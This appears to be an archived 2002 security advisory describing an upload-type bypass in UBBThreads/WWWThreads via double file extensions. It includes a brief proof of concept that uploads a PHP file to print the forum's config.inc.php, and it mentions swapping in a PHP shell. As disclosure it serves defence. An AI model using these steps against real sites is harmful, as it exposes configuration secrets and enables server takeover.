Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: web5052.htm

WWWThreads and UBBThreads upload file restrictions by type may be bypassed



31th Jan 2002 [SBWID-5052]
COMMAND

	WWWThreads and UBBThreads  upload  file  restrictions  by  type  may  be
	bypassed

SYSTEMS AFFECTED

	WWWThreads and UBBThreads 5.5 Dev11 and piror

PROBLEM

	From   RootExtractor   CompuMe   of   recm   security   team    advisory
	[http://hop.to/condor] :
	

	The vulnerability lies in the following configuration file :
	

	

	..: config.inc.php :..

	------------------------- snip ------------------------------

	

	// $config[\'excludefiles\'] 

	= \".php,.asp,.js,.vbs,.sht,.htm\";

	   $config[\'allowfiles\'] = \".zip,.txt,.gif,.jpg,.jpeg,.bmp\";

	

	------------------------- snip ------------------------------

	

	 

	The bug is that files that are not allowed in the listed could still  be
	uploaded. The extension is checked but if  someone  added  an  allowable
	extension first before the bogus extension the file would upload.
	

	

	Example :
	

	you allow the upload or .txt,.jpg,.bmp,.zip all files that  don\'t  have
	those extensions should not be uploaded However if somebody changes  the
	name  of  the  file  to  blah.txt.php  the  file   will   validate   and
	upload......huh !
	

	Exploit : =========
	

	

	1) make new file $ touch blah.txt.php

	2) edit it       $ vi blah.txt.php (in this step, write a php 

	code, for example)

	

		            <?php

		            	$readfile = join(\"\", file

	(\"../config.inc.php\"));

		          	print $readfile;

		            ?>

	

	3) save & upload it

	4) visit your blah file, now you can to see a config file 

	of your victim forum

	5) i\'m replaced readfile code by php shell file

	

SOLUTION

	Upgrade to UBBThreads 5.5 from :
	

	http://www.infopop.com/

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH